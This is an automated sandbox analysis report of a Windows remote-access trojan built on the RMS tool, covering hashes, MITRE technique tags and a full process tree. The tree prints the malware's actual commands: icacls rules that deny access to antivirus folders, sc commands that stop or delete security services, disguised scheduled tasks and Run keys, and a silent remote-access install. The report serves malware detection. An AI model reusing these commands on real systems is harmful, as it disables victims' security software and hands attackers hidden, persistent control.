rms | 22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f

Analysis

max time kernel
47s
max time network
175s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
24-05-2022 02:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Size

10.6MB
MD5

f91f26d0d89bfacb228fcc9d1ca546dc
SHA1

19e61923b8fac8149b9109ac6633dba760608218
SHA256

22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f
SHA512

bf4fff966e3fa0f2bed6442ca80a336d607885aa255357e522bc02753d1a4b7e5b25edf0065f8ad1c90491b8c72b0c1ee9b2e097f535e85ad056c80c4e653d1f

Score

10^/10

rms aspackv2 discovery evasion persistence rat trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x000200000001eb45-191.dat	acprotect
behavioral2/files/0x000200000001e7d5-190.dat	acprotect

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x000200000001e62d-148.dat	aspack_v212_v242
behavioral2/files/0x000200000001e62d-156.dat	aspack_v212_v242
behavioral2/files/0x000200000001e62d-169.dat	aspack_v212_v242
behavioral2/files/0x000200000001e62d-176.dat	aspack_v212_v242
behavioral2/files/0x000200000001e62c-199.dat	aspack_v212_v242
behavioral2/files/0x000200000001e62c-197.dat	aspack_v212_v242
behavioral2/files/0x000200000001e62c-192.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Executes dropped EXE 4 IoCs

pid	Process
3116	wini.exe
4592	winit.exe
4412	rutserv.exe
116	rutserv.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000200000001eb45-191.dat	upx
behavioral2/files/0x000200000001e7d5-190.dat	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	WScript.exe

Modifies file permissions 1 TTPs 56 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3724	icacls.exe
1864	icacls.exe
3156	icacls.exe
4460	icacls.exe
2836	icacls.exe
5088	icacls.exe
5008	icacls.exe
1828	icacls.exe
3656	icacls.exe
4280	icacls.exe
3348	icacls.exe
1084	icacls.exe
4152	icacls.exe
4848	icacls.exe
4356	icacls.exe
2084	icacls.exe
1744	icacls.exe
4640	icacls.exe
3888	icacls.exe
2312	icacls.exe
636	icacls.exe
4100	icacls.exe
1136	icacls.exe
4284	icacls.exe
4020	icacls.exe
1912	icacls.exe
4416	icacls.exe
2120	icacls.exe
4996	icacls.exe
1100	icacls.exe
3228	icacls.exe
4244	icacls.exe
3212	icacls.exe
4356	icacls.exe
5088	icacls.exe
4104	icacls.exe
3724	icacls.exe
2040	icacls.exe
5096	icacls.exe
3928	icacls.exe
2084	icacls.exe
1000	icacls.exe
4728	icacls.exe
4864	icacls.exe
4996	icacls.exe
1184	icacls.exe
4248	icacls.exe
1980	icacls.exe
1188	icacls.exe
2344	icacls.exe
2248	icacls.exe
3192	icacls.exe
2844	icacls.exe
4348	icacls.exe
4252	icacls.exe
2616	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com

Modifies WinLogon 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000200000001e7d4-140.dat	autoit_exe
behavioral2/files/0x000200000001e7d4-139.dat	autoit_exe
behavioral2/files/0x00060000000231e5-184.dat	autoit_exe
behavioral2/files/0x00060000000231e5-183.dat	autoit_exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1072	schtasks.exe
3772	schtasks.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
2424	timeout.exe
4100	timeout.exe
1000	timeout.exe
640	timeout.exe
4244	timeout.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1484	taskkill.exe
4728	taskkill.exe
1196	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings	wini.exe

Runs .reg file with regedit 2 IoCs

pid	Process
3960	regedit.exe
3184	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
4412	rutserv.exe
4412	rutserv.exe
4412	rutserv.exe
4412	rutserv.exe
4412	rutserv.exe
4412	rutserv.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4412	rutserv.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4592	winit.exe
4412	rutserv.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 3652 wrote to memory of 1072	3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	83
PID 3652 wrote to memory of 1072	3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	83
PID 3652 wrote to memory of 1072	3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	83
PID 3652 wrote to memory of 3116	3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	82
PID 3652 wrote to memory of 3116	3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	82
PID 3652 wrote to memory of 3116	3652	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	82
PID 3116 wrote to memory of 4596	3116	wini.exe	87
PID 3116 wrote to memory of 4596	3116	wini.exe	87
PID 3116 wrote to memory of 4596	3116	wini.exe	87
PID 3116 wrote to memory of 4592	3116	wini.exe	84
PID 3116 wrote to memory of 4592	3116	wini.exe	84
PID 3116 wrote to memory of 4592	3116	wini.exe	84
PID 4596 wrote to memory of 2284	4596	WScript.exe	92
PID 4596 wrote to memory of 2284	4596	WScript.exe	92
PID 4596 wrote to memory of 2284	4596	WScript.exe	92
PID 2284 wrote to memory of 3960	2284	cmd.exe	361
PID 2284 wrote to memory of 3960	2284	cmd.exe	361
PID 2284 wrote to memory of 3960	2284	cmd.exe	361
PID 2284 wrote to memory of 3184	2284	cmd.exe	89
PID 2284 wrote to memory of 3184	2284	cmd.exe	89
PID 2284 wrote to memory of 3184	2284	cmd.exe	89
PID 2284 wrote to memory of 2424	2284	cmd.exe	90
PID 2284 wrote to memory of 2424	2284	cmd.exe	90
PID 2284 wrote to memory of 2424	2284	cmd.exe	90
PID 2284 wrote to memory of 4412	2284	cmd.exe	93
PID 2284 wrote to memory of 4412	2284	cmd.exe	93
PID 2284 wrote to memory of 4412	2284	cmd.exe	93
PID 2284 wrote to memory of 116	2284	cmd.exe	94
PID 2284 wrote to memory of 116	2284	cmd.exe	94
PID 2284 wrote to memory of 116	2284	cmd.exe	94

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
5104	attrib.exe
4448	attrib.exe

C:\Users\Admin\AppData\Local\Temp\22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
"C:\Users\Admin\AppData\Local\Temp\22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3652
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4592
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:5024
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2284
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4412
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        
        PID:116
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        
        PID:4140
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:5104
      - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
        6⤵
        Modifies file permissions
        
        PID:2040
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:4448
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        
        PID:1660
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        
        PID:4136
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        
        PID:3796
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15
  2⤵
  - Creates scheduled task(s)
  PID:1072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  PID:2312
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    PID:3552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  PID:2692
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:3740
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:3884
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    PID:4744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:2272
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:3156
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:4104
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    PID:4832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:1728
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:5004
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:4520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    PID:3120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:2956
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:2976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:3684
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    PID:3584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:2056
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:1152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:1764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:5088
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  PID:2268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:1484
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:208
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1100
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:4964
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5012
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:956
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:4300
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:3328
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:796
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4248
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:4432
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:1828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:4404
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:4152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:3724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:3632
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:5008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4380
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3584
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3056
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:4348
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2312
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3516
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1136
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5008
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1756
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3708
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4652
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4280
